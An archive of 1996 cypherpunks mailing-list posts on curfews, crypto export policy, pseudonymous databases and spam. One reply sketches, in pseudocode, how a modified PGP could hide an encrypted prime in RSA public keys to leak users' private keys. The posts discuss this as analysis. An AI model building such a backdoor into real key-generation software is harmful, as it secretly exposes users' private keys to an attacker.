To: cypherpunks@toad.com
Subject: [Off-Topic]  "Curfews"
Message-ID: <add4f01401021004d019@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Cypherpunks,

This is off-topic for the list, but I want to share it anyway. It touches
on issues of increasing police surveillance, and also touches on the issue
of "age credentials" (in the sense that how else is a cop who stops a young
person for "curfew violation" to determine if a violation has occurred when
most 14- and 15-year-olds carry no driver's licenses?)

The "curfew" meme is spreading quickly, with Clinton calling for a federal
curfew, at least in cities, and Dole trying to outdo him with even more
draconian curfew laws. Many communities already have them, including San
Jose, New Orleans, and other large cities. And my own community, Santa Cruz
County, ironically begins a curfew program on Saturday, tomorrow.

I wrote this item for our local newsgroup, scruz.general, announcing that
"my household" will not abide by this law. I didn't come out and say "my
kids" would not abide by it, inasmuch as I have no kids. So I elliptically
referred to "parents and guardians"...after all, my sister visits with her
husband and son, and in theory I could be the guardian of this kid. And
friends bring their kids.

My point is to send a "warning" to the Sheriff's office that at least some
households think this crackdown on the movements of children is
unacceptable. Children have the right to travel, especially as the parents
permit it, without being stopped, questioned, forced to state their
destinations, and, if the answers don't satisfy the cop, taken into
detention at some children's equivalent of a "drunk tank."

(Some purists claim that children are exempted from normal constitutional
protections, such as the right of free association, the right to be free
from unwarranted searches and seizures, the right of free speech, etc.
Especially this comes up in debates about rights in public schools (speech,
locker searches, movements are controlled, etc.). But I think a public
school environment is a dramatically different situation, whatever one
thinks of these claims about rights, from a kid walking on a public street.
To claim that such a child may be stopped, interrogated, taken to a
detention center, without a crime having been committed, is a clear
violation of his or her rights.)

As I said, should such curfews become widespread, children will of course
need forms of age identification, and this opens yet another door for
universal I.D. cards. And for "travel papers."

Maybe it would be easier to just put a tattoo on their arms--especially as
the younger generation is so into tattoos these days. "Pappieren, bitte.
Macht schnell!"

Here's what I sent in to scruz.general tonight:


So Santa Cruz begins its own fascist crackdown on the free movements of
persons. The "curfew" begins Saturday night.

Allegedly these persons are children, but it is up to parents and
guardians to control the movements of their children or charges in public
places, NOT the function of the police to detain these children or
charges. (Initially a "warning," but the child's name is recorded in
police data bases....if the child is detained a second time, he or she may
face detention time, community service, fines on the parents or guardians,
and so forth.)

ANNOUNCEMENT: I am responsible for the children in my household or in my
custody or guardianship. Not the cops. Not the Sheriff. Not the CAMP
helicopters. Not the narcs. Not the vice squad. Not anyone but me.

I am instructing those in my household or who visit to IGNORE all
interrogations by cops. I am telling them not to let the cops search their
bags, not to let the cops ask where they are going, not to let the cops
demand that they give a reason for being out. If they pick up people from
my household, I expect the children to remain silent and to just fill up
the god-damned jail cells until I eventually raise a ruckus and (maybe)
pick them up.

If some kids are out and about and making mischief, the cops should
concentrate on catching _those_ children! Don't immobilize all kids  for
the sake of supposedly cutting down on the activities of the perps. As
with so many do-gooder laws, the effect will largely be felt on the "good"
kids and will be ignored or evaded by the "bad" kids.

As to the claims that children have no valid reason to be out after 9, or
11, or whatever, this is not for anyone but the parents and guardians to
decide. The god-damned cops are not the ones to decide what a valid reason
for being out is.

(I have heard that "religious worship," a la "Midnight Mass," is one of
the valid reasons for a child to be out after curfew. Fine, religion is
then the stated reason those in my household are out! I will tell them to
tell any nosy cops or Sheriff's Deputies that they are worshippers of
Baal, and Baal requires them to be out to appreciate the darkness. If the
cops claim this is "not a valid religion," I will recite to them the First
Amendment of the U.S. Constitution, where it says: "Congress shall make no
law respecting the establishment of religion or prohibiting the free
exercise thereof.")

I moved to the rural part of Santa Cruz, Corralitos, to escape this
fascist and socialist nonsense, and now I find it primarily the
Sheriff-dominated parts of this county which will now claim to tell
parents and guardians they no longer control their children.

Fuck this.

--Tim May

--
Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 1 Jun 1996 14:08:46 +0800
To: cypherpunks@toad.com
Subject: "Anonymity is bad," says a source who wishes to remain anonymous
Message-ID: <add4f6fa040210046ef3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I'm not going to dig up the exact quote, but I was struck by a couple of
"comments" on crypto policy recently. One involved some crypto news of
several days ago, and one was reported yesterday in the "San Jose Mercury
News," in an early glimpse of what the NRC report would say.

In both cases--and these were not the first such cases I've seen--a source
"who wishes to remain anonymous" is announcing just how bad and dangerous
crypto, anonymity, remailers and stuff like that are.

"But the official, speaking on condition of anonymity, insisted that any
computer system that did not include a way for authorities to decipher data
would 'pose very costly and time-consuming problems' for law enforcement
officials."

[SJMN, C1, 1996-05-30]

""Anonymity is bad," says a source who wishes to remain anonymous."

The definition of irony, I'd say.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 1 Jun 1996 14:43:50 +0800
To: cypherpunks@toad.com
Subject: Re: Statistical analysis of anonymous databases
Message-ID: <v02120d14add55f5f9a05@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:53 5/31/96, David Wagner wrote:

>How about a simple non-technical solution?  Each patient picks a
>random pseudonym; the database is keyed off that pseudonym, and the
>person's True Name(tm) never appears in the database.  Patients
>should remember their pseudonym (or write it down); then they can
>add information to the database.

In medical research, third party audit, i.e., the Department of Health and
Human Services, is often required. A simple pseudonym picked by the patient
won't do.


Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Sat, 1 Jun 1996 09:11:37 +0800
To: cypherpunks@toad.com
Subject: Re: Backdoor in RSA Discovered
Message-ID: <199605311811.UAA10519@internal-mail.systemics.com>
MIME-Version: 1.0
Content-Type: text/plain



>  In this paper we present a mechanism that can quite easily be
>  added to PGP that allows the person who modifies PGP to learn
>  the private keys of those who use it to generate keys. Furthermore
>  the keys are leaked securely and subliminally, i.e. even if you
>  analyze the source code you cannot determine previously generated
>  keys or future keys, only the attacker can. The only way to detect the
>  presence of the mechanism itself is by looking over the source code, or
>  the compiled code. The attack has the effect of turning a database of
>  public keys into a database of public/private key pairs with respect to
>  the attacker *exclusively*.

Sounds like they are doing something like this:

        Generate a prime P of 500 bits (say)
        Encrypt with Mallets public key
        Generate start_q using (E(P) << 524)/P
        Keep incrementing start_q until prime, and call this Q
        Generate N by multiplying P and Q to get a 1024 bit key
        Top 500 bits of N will be E(P)

It could also be done like this:

        Generate a random H of, say, 290 bits
        Keep incrementing H until (H << 300) + 1 is prime
        and call this Q
        Encrypt H for Mallet
        H <<= 10
        Keep incrementing H until prime
        Generate N by multiplying P by Q, to get a 900 bit key
        Bottom 300 (but 10) bits of N will E(P)

I'm sure there are few mistakes, and there need to be
a few other trivial tests in there somewhere, but I think this
should work.

The first method should produce "better" keys than the first
(as if Mallet cares)

I'll try and knock some code up to demonstrate this over the next
few days.


Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: harka@nycmetro.com
Date: Sat, 1 Jun 1996 12:16:40 +0800
To: cypherpunks@toad.com
Subject: Re: Fight-Censorship Disp
Message-ID: <TCPSMTP.16.5.31.-12.12.32.2780269260.1163230@nycmetro.com>
MIME-Version: 1.0
Content-Type: text/plain


-=> Quoting In:declan@eff.org to Harka <=-
 
 In> 4.1 -- Products providing confidentiality at a level that
 In> meets most general commercial requirements should be easily
 In> exportable.  
 
 For they are easily breakable...
 
 In> 4.2 -- Products providing stronger confidentiality should be
 In> exportable on an expedited basis to a list of approved
 In> companies if the proposed product user is willing to provide
 In> access to decrypted information upon legally authorized
 In> request. 
 
 Sounds like a "Clipper VI" proposal. 
 
 In> Recommendation 5:  The U.S. government should take steps to assist law
 In> enforcement and national security to adjust to new technical realities
 In> of the information age.

 See 4.1 and 4.2.

 
 Harka

___ Blue Wave/DOS v2.30 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 1 Jun 1996 15:45:28 +0800
To: cypherpunks@toad.com
Subject: Re: "Anonymity is bad," says a source who wishes to remain anonymous
Message-ID: <199606010435.VAA24130@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:27 PM 5/31/96 -0700, Timothy C. May wrote:

>In both cases--and these were not the first such cases I've seen--a source
>"who wishes to remain anonymous" is announcing just how bad and dangerous
>crypto, anonymity, remailers and stuff like that are.
>
>"But the official, speaking on condition of anonymity, insisted that any
>computer system that did not include a way for authorities to decipher data
>would 'pose very costly and time-consuming problems' for law enforcement
>officials."

But Tim, you know he is absolutely and literally correct!  It will, indeed, 
cause SERIOUS problems for those law-enforcement officials.  It'll put'em 
out of a job, at the very least.  Termination.  Possibly with extreme prejudice.

Seriously, however, for once I'd like to see some reporter pursue this kind 
of allegation with the person they're talking to.  He should ask, "what 
percentage of existing crime could be accomplished more effectively with 
good encryption that the cops can't break."  The truthful answer is, "not 
too damn much!"  

It seems to me that official-types must be thinking overtime about this kind 
of thing, because we're getting so much out of them along these lines.  
They're scared, for sure.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <>
Date: Sat, 1 Jun 1996 17:00:35 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199606010453.VAA05321@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! >                   Copyright 1996 The New York Times Company
! >                                      ^^^^^^^^^^^^^^ 
! >            Report Warns of Security Threats Posed by Computer Hackers
! >                                     ^^^^^^           ^^^^^^^^ ^^^^^^^
! >            [W] ASHINGTON -- Government investigators warned
! >            Wednesday that computer hackers cruising the
! >                                            ^^^^^^^^
! >            Internet posed a serious and growing threat to national
! >            ^^^^^^^^            
! >            security, with the Pentagon suffering as many as 250,000
! >                                                             ^^^^^^^
! >            "attacks" on its computers last year.
! >            ^       ^
! > 
! > 
! > -- 
! > Love,
! > Qut@netcom.com
! > 
-- 
Love,
Qut@netcom.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 1 Jun 1996 16:10:33 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: Statistical analysis of anonymous databases
Message-ID: <v02120d02add5829399c2@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 0:56 6/1/96, Alan Horowitz wrote:
>> In medical research, third party audit, i.e., the Department of Health and
>> Human Services, is often required. A simple pseudonym picked by the patient
>> won't do.
>
>   It's not clear to me that the second sentence follows from the first.

HSS needs to verify that the researcher didn't just make up the data. The
Department therefore has to be able to audit the results of the study by
contacting a small subset of the participants directly. How can the
Department contact the participants if they are known only under their
nyms? No, pseudonymous remailers are not a valid answer. All this has to be
done without requiring any type of email/Internet access. US Mail only.


Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <>
Date: Sat, 1 Jun 1996 16:41:00 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199606010545.WAA16309@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


yes




-- 
Love,
Qut@netcom.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <>
Date: Sat, 1 Jun 1996 17:02:16 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199606010614.XAA20292@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


gui is jw unix i ns

















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 1 Jun 1996 17:32:24 +0800
To: cypherpunks@toad.com
Subject: "The 666 Club"
Message-ID: <add534800202100435ab@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:27 AM 6/1/96, Deranged Mutant wrote:
>On 23 May 96 at 7:46, Declan B. McCullagh wrote:
>[..]
>> More to the point, the left and the right come together on privacy issues.
>>
>> Remember the Christian Coalition's take on national ID cards? "Mark of
>> the Beast!" (Does anyone have an original cite for this? I also recall
>> the CC opposing Clipper...)
>
>There was actually a pretty good special on the 700-Club when Clipper
>first came out (at least from a transcript posted on the comp.org.eff
>newsgroup).
>
>Yep. They were against it.

I saw a videotape of this episode of "The 700 Club," in November 1992.

Pat Robertson and his co-anchor were worked up about (and against) Clipper.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Fri, 7 Jun 1996 22:02:05 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Re: INteresting tidbit
Message-ID: <199606070506.WAA20840@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>On the Encryption note, and I swear not along the lines of the 'DOJ' 
>and 'FBI Snooping' Big-Brother events, I heard another story recently.
>
># begin story
>
>A person working on the MBONE project did an unannounced experiment
>across the internet using Triple-DES for MBONE, and the very next day, 
>'ATF' agents knocked on his door and warned him against exporting 
>munitions.  The experimentor was shaken by the fact that agents 
>approached him so quickly after the experiment.
>
># end story
>
>Extrapolations of fact:
>   1.   Internet traffic is monitored.
>   2.   The ability to snoop for encrypted traffic is present
>   3.   The ability to identify encryption levels is present
>        (How else can they differentiate DES-1 from DES-3?)
>   4.   The ability to crack DES-1 in near real-time mode is present.
>        (See above).
First, this has been loosely confirmed for ages. Someone was mentioning that FBI offices 
supposedly have software that (on a 486) can crack a DES-1 key in under an hour. Multiply * 
modern high capacity computers = problem.  However, this does not nessesarily follow from 
#3. First off, you could probably tell the encryption used from a file format; the software 
on the other end has to know what it's getting. Secondly, you could probably tell quite a 
lot about what was used by some intense analysis.
Finally, if their software cannot read it and analysis suggested it was more than DES-1 
then they might go after someone w/o being able to read the document in question.
>   5.   If above=true, then Feds dropping the Zimmerman PGP case probably
>        also points to it also being crackable in a similar manner.
Not necessarily. This freemen issue shows that the FBI is getting gunshy about bad 
publicity, which they were getting.
>   6.   Using encryption only flags traffic for capture and decryption, 
>        using strong encryption makes you all that more interesting.
Sounds like the old argument for encrypting everything...

>Sorry, couldn't resist.  I'll try not to start a threads about 
>electro-plasma propulsion craft at Area 51, metallic-ceramic skin 
>and pulse-jets on the Aurora spy plane, heat-imaging video cameras 
>on satellites and planes that can watch you through your houses' roof, 
>etc.  :)

What??? Now you're going to tell us X-Files is just a TV show? <g>

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Fri, 7 Jun 1996 19:17:50 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Re: Clipper III analysis
Message-ID: <199606070506.WAA20841@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


On 29 May 1996 14:53:30 pdt, tcmay@got.net wrote:

>>        A good Questioned Document Examiner will be able to demonstrate
>>        that the signed document in question was not authored by Joe
>>        Blow, even if it contains his digital signature.
>
>I was of course talking about digital signatures, not handwritten signatures.
>
>I would be very interested to hear how a "Questioned Document Examiner" can
>possibly determine that a digital signature was not applied by a particular
>person.

I believe he was referring to document analysis. By closely comparing a questionable work 
with those of known authorship, a skilled analyst can hopefully find enough 
[dis]similarities to say whether a document was authored by a given person.

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Fri, 7 Jun 1996 20:19:54 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Re: [crypto] crypto-protocols for trading card gam
Message-ID: <199606070506.WAA20842@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


On 29 May 1996 18:57:58 pdt, alanh@infi.net wrote:

>What _did_   Solitaire do for Windows 3.1?   Distract the attention of 
>the unwashed masses away from the actual merits of the beast?

Actually, I believe it covered a direct lack thereof.
(Of course, you could have been intending this in a heavily sarcastic form. In that case, I 
agree entirely)

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Fri, 7 Jun 1996 21:55:09 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Re: forged addresses
Message-ID: <199606070506.WAA20846@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


On 29 May 1996 19:38:16 pdt, nobody@nowher.com wrote:

>Hi, I'm not sure if there was ever a thread on this, but I was wondering if 
>anyone can determine your real email address, if you were to fake it to your 
>email client.
>
>I hope that this doesn't offend anyone, since this is a high traffic list, but 
>I was wondering if this would work.  To try it out, I setup my client to think 
>I was someone else, and sent myself an email.  I could only figure out what 
>ISP it came from.
>
>What I would like to know is, can any of the experts on this list determine my 
>address from the header of this post??
I didn't receive anything except your nobody@... address.
>again, if this is something that I shouldn't have done, just let me know, and 
>it won't happen again.
>
 Hmmm... I'm going to have to play around with this. I can get outbound email access 
through my school district's mailserver simply by filling in the appropriate fields in 
netscape (we have a WAN hooked up to a T1).  It would seem to me that this would be rather 
secure for several reasons, if for no other than that NO logging is made... In a large 
district, like mine (probably 10-15 thousand potential users), I doubt they would have the 
resources to track any of the 100 or so Internet machines on my campus alone, even if they 
could tell it came from here.

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Sun, 25 Aug 1996 09:47:49 +0800
To: jad@dsddhc.com (John Deters)
Subject: Re: Spamming
In-Reply-To: <2.2.32.19960822220224.006a0ff0@labg30>
Message-ID: <199605140403.EAA00545@fountainhead.net>
MIME-Version: 1.0
Content-Type: text


> 
> At 02:55 PM 8/22/96 +0000, Vipul Ved Prakash wrote:
> >> 
> >> At 06:09 PM 8/20/96 -0700, Rich Graves wrote:
> [deleted]
> >>   1. Junkmail requires the SENDER to pay for it, not the recipient.
> >    Internet pricing models are complicated and debatable, but you surely
> >    end up paying for snail-junk-mail. Not directly, but hidden in the high
> >    first-class mail costs. More mail, more infrastructure, higher costs.
> >    This could be quite true for the net also, if we consider bandwidth costs
> >    money.
> 
> I beg to differ.  The USPS considers "junk" mail their bread-and-butter.
> Huge mailings of all manner of bulk mail (especially those that are PostNet
> barcoded by the sender) pay the bills around the Post Office.  Your "more
> mail, more infrastructure, higher costs" argument is flawed.  The post
> office has many fixed costs related to maintaining their huge presence,
> delivering to so many rural addresses.  If we had to pay a per-letter basis
> *discounting* the value provided by the infrastructure already in place
> supporting the bulk-mail handling systems, we'd be paying roughly Federal
> Express 2-day letter rates for each piece of mail (around $6.00, if memory
> serves correctly.)

Alright, I agree. Though this could very easily differ with size and reach 
of a PS.  But on the net it means more bandwidth right? 
Which means more bandwidth, and more money. Hang on. This might not be 
a problem in US (as jim bell points out there is tons of untapped bandwith), 
but it is in other not so well connected countries. 
For example, if somebody spams an Indian Network from india, the
spam goes to US and comes back to india (since our govt sayz you cant connect
2 local networks!) and eats up most of the 20 MBps bandwidth.
Gov't will buy more bandwidth and will make us pay for it!

- Vipul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Sun, 25 Aug 1996 08:09:54 +0800
To: cypherpunks@toad.com
Subject: Re: Spamming
Message-ID: <199605140416.EAA00577@fountainhead.net>
MIME-Version: 1.0
Content-Type: text


>  The advertizers in printed & broadcast media exercise a great deal of control
>  over the content. E.g., a magazine that gets revenues from tobacco ads isn't
>  likely to run a story about tobacco companies trying to addict kids. That's
>  why you see more anti-tobacco content in broadcast media (who can't run
>  tobacco ads) than in printed media. (And there are cross-ownership
>  restrictions.)
 
This can be true to certain extent. But if the mag doesn't maintain 
objectivity, it will kill itself slowly. Same is true of broadcast media.

Vipul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Sun, 25 Aug 1996 11:10:03 +0800
To: zachb@netcom.com (Z.B.)
Subject: Re: Weird "Suppression" messages
In-Reply-To: <Pine.3.89.9608232204.A26805-0100000@netcom19>
Message-ID: <199605140438.EAA00686@fountainhead.net>
MIME-Version: 1.0
Content-Type: text


> 
> I don't have a clue what it is, but it's sure pissing me off.  I've 
> gotten about 15 or so of these messages in the past two hours.  If it's 
> an honest error, then someone better fix it real fast; if some loser is 
> jerking us around, ......
> 

Is this all becuz of those bad nameserver records floating around the net?
Tons of ISP's have gone down!

- Vipul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Sun, 25 Aug 1996 08:54:27 +0800
To: cypherpunks@toad.com
Subject: Web Resource on Netspam
Message-ID: <319812D5.604D8509@pobox.com>
MIME-Version: 1.0
Content-Type: text/plain

http://www.metareality.com/~nathan/visit.cgi/html.Spam

Title: Spam (Not the Hormel product)






<a href="http://www.metareality.com/~nathan/visit.cgi/html.Spam"
>[Fighting Spam]
 :

[Graffiti]
 :

[Home]
 :

[Limericks]
 :

[Linkage]





An honest
politician
is one who
takes your
bribe AND
votes as
you ask.




Spam (Not the Hormel product)

Anyone familiar with the usenet has seen it.  It's the vile stuff that
brain-dead get-rick-quick scheme promoters and professionsal advertisers
foist upon us all with increasing regularity.  There are (to date) two 
species of spam, differentiated by the mechanism by which they are 
delivered.  Each has its own defining charateristics, each has its own 
sub-species, but both have two things in common: they're made possible by 
the workings of the internet, and they're both examples of the same type 
of 'cost-shifting' that made junk faxes illegal.  Contrary to postal junk 
mail, where the sender bears the full cost of delivery, the spammer bears 
only a fraction of the cost of delivery; the remainder of the costs are 
borne by us, the recipients.  It's a waste of your bandwidth, your disk 
space, and your time.


email spam
Messages delivered by electronic mail to large numbers of recipients 
who did not ask for or otherwise solicit the messages.  It's the 
junk mail of the 21st century, only worse.

usenet spam
Messages delivered by usenet to large numbers of newsgroups whose 
chartered topics are unrelated to (and may even explicitly forbid) the 
topic of the message.



Not enough people seem to
realize that there are constructive ways to deal with it, and to reduce
the chance that you'll have to deal with it again in the future. 



  What to do

  What NOT to do



  The most effective is to write some 
  polite email to the administrator of the site from which the spam 
  originated.

  You'll soon learn that most system administrators are very unhappy 
  about users who spam the net.  It's 
  always gratifying when they write back to tell you that the offending 
  account has been terminated.

  Start reading <a 
  href="usenet://news.admin.net-abuse.misc">news.admin.net-abuse.misc 
  to learn more about how to deal with spammers.

  If there's a 1-800 number, call it to express your displeasure.  
  It might please you to note that 1-800 numbers typically cost them a 
  small amount of money with each call.  How much do you pay for your disk 
  space and bandwidth with each unsolicited bit of email?  It's only fair, 
  right?

  Grab your telephone, or even pay them a visit in person.  You 
  generally have to have access to a unix command line to find the phone 
  numbers and addresses, unless you're dealing with the same <a 
  href="http://www.metareality.com/~nathan/visit.cgi/spam/html.Offenders">spammers that have been 
  bothering me.  Why stick to email?  If they're in your area, tell 
  them face-to-face that you object to their tactics.



  Don't post a follow-up message in the same newsgroup.  Do you 
  really think that the spammer is going to re-visit thousands of 
  newsgroups to see what people had to say?

  The same goes for mailing lists.  If you get spammed via a mailing 
  list, never reply to the list.  Your words will just get 
  re-broadcast to everyone else on the list, thus doubling the nuisance 
  created by the spammer.





Fun stuff that doesn't get results, but might be good for a laugh


RecyclingIf they enjoy sending spam, then it only makes sense that
they wouldn't mind getting their own, right?  Just for kicks, forward each
new spam to the spammers who have pestered you in the past.  While I can't
vouch for its effectiveness, it does reek of
poetic justice, and it makes me feel a little better. 
It usually makes people laugh out loud when I explain it, too. <img src =
"http://www.metareality.com/~nathan/images/SMILE.GIF">

A Pre-emptive Anti-Spam TacticWhy wait to get spammed, when you
can see them coming in <a
href="news:news.admin.net-abuse.misc">news.admin.net-abuse.misc?  <a
href="http://www.metareality.com/~nathan/visit.cgi/spam/html.p.Pre-empt">Let the spammers know in advance that they
will be charged (insert dollar amount here) if they send you any junk
mail.  



Additional references


Spam and Anonymous Remailing Services

Damien Lucifer (<a 
href="mailto:ncognito@gate.net">ncognito@gate.net) operates an
anonymous remailing service.  He's put together a page covering spam and
remailers, including how to get a remailer to stop spamming you, and 
it is my pleasure to host this page for him. 

mail bombing
For advanced spam-fighters only.  Can concerted emailbombing be 
employed as a legitimate spam-fighting tactic?  Pros, cons, and related 
issues.

About Junk 
Email
Some of the hows and whys of junk email, and tactics you can use to 
help rid yourself of it.

A press release from MCI
...with information about their 
anti-spam policies.  See also their <a 
href="http://www.mci.com/aboutmci/news/nfr/spam.shtml">online policy 
statement.  Note that MCI's seriousness about these statements has 
been severely questioned in light of their (mis)handling of the 
Moneyworld/CHAG spammer.  30 days between announcing that the situation 
is being dealt with and finally cutting off a spammer with 
message-per-week spamming speed?  This is pretty disgusting in light of 
the good press MCI got when they announced their spam policies.  It's 
starting to look more like a PR stunt than a policy statement.  I 
can only take comfort knowing that at least their sysadmins are aware of 
(and frustrated with) the situation.

I must disclaim that civil legal issues may be involved in the
MCI/Moneyworld dispute, so there may be things going on that the public
isn't aware of.  Still, for MCI not to have covered its corporate ass does
not speak well of MCI's sincerity or the competence of MCI's lawyers.  

Outlaw 
Junk EMail Now!
Write your legislators, ask them to expand the 

TCPA to include junk email!  Note that as the law is currently 
written, it is 

unlikely to be applicable to email.

Fighting Junk 
Email"
More information about junk email and related issues.  Includes 
pointers to mechanical tactics for dealing with junk email.

Spam FAQ
Everything you never wanted to know about net spamming.

Get that 
spammer!Webified TCP/IP tools to aid in the fight against spam.

<a 
href="http://techweb.cmp.com/net/issues/036issue/036law.htm">Litigation 
to the rescue?
Use of the Telephone Consumer Protection Act of 1991 (47 U.S.C. sec 227) 
to nail junk emails.  The case described was settled out of court, but 
the ideas is intriguing.  This commentary, written by a lawyer, does not 
seem optistic about applying the TCPA directly to junk email, but 
doesn't rule out the possibility, either.

Litigation to the 
rescue!
$500 fines for junk mail via the courts.  Sounds like promising 
tactic for dealing with intra-USA spammings.  <a 
href="http://www.metareality.com/~nathan/visit.cgi/spam/html.FaxLaw">Some commentary on this law was posted to 
usenet a while back.

<a 
href="http://www.usps.gov/websites/depart/inspect/chainlet.htm">The U.S. 
Postal Service on Chain Letters
Contrary to what the make.money.fast crowd would have you believe, 
these scams are illegal.  See the aforelinked page for details, 
and and consider talking to the appropriate <a 
href="http://www.usps.gov/ncsc/locators/find-is.html">postal 
inspector as well.

<a 
href="http://www.bbb.org/council/complaints/consumerform.html">The Better 
Business Bureau
These folks will be happy to be notified of 'improper selling 
practices' via the aforelinked form.

Anti-Spam lists
This is a relatively new phenomenon.  People are starting to offer 
the 'service' of collecting lists of addresses of folks who do not want 
to get spam.  

I think this is a bad idea, since it attempts to legitimize 
junk email, by implying that if an email address is not on the list, it's 
prefectly OK to send junk email.  The other problem with this idea is 
that there are going to be several of them, and no junkmailer is going to 
filter their list using each "service."  Thus, it will be up to the 
recipients to track down all of the "services."

Currently there are at least three running.  One is at 
http://dm1.com/Epreference/epref.html, one is at 
http://www.kenjen.com/nospam,
and I don't have an URL for the last - it was sent to me via unsolicited 
email, naturally.

Terms of Service and Acceptable usage policies
Most Internet service providers require that their customers agree to 
a set of terms of service (TOS) or an acceptable usage policy (AUP).  A 
random sampling: <a 
href="http://www.mindspring.com/aboutms/policy.html">Mindspring's 
policy, Primenet's 
AUP, MCI's
spamming policy, and the terms and conditions for my own ISP, <a 
href="http://webfaq.halcyon.com/faq/nwn/nwntac.txt">Northwest Nexus 
(a.k.a. halcyon.com).

I should note that while Northwest Nexus doesn't describe spamming in 
their terms of service, they have booted more than one spammer in the 
past.  It surprises me greatly that they aren't explicit about this in 
their published terms and conditions.

A spamhandling robot
This is very "under construction," but worth mentioning anyhow.  I'm 
putting together some perl code to automate 
the spam-handling process.  




Common flavors of net.spam


